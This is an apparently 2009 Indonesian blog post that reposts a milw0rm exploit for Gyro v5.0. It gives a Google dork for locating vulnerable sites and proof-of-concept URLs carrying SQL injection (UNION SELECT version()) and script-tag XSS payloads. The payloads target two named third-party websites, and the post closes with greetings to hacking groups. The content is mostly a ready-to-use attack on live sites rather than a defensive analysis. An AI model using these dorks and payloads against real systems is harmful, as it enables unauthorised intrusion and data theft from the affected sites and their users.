OK, bug ini adalah bug yang ada di Gyro v.5.0 dan ditemukan oleh OoN_Boy
Kita akan langsung liat apa bugsnya...
Google Dork:
"powered by Gyro V5.0"
Exploit:
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]
POC:
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
INGET!
AB = <>
Copased from milw0rm.com
OoN_Boy juga meninggalkan pesan-pesan terakhir kepada (Greetz maksudnya...): Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
---END---
Special Thanks to OoN_Boy
Sumber: www.milw0rm.com
Jumat, 11 September 2009
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar
Silahkan kasih komentar kepada saya, walaupun bagus, jelek, saya akan menerimanya, dan mengoreksinya... Kan gak ada yang sempurna kan? :D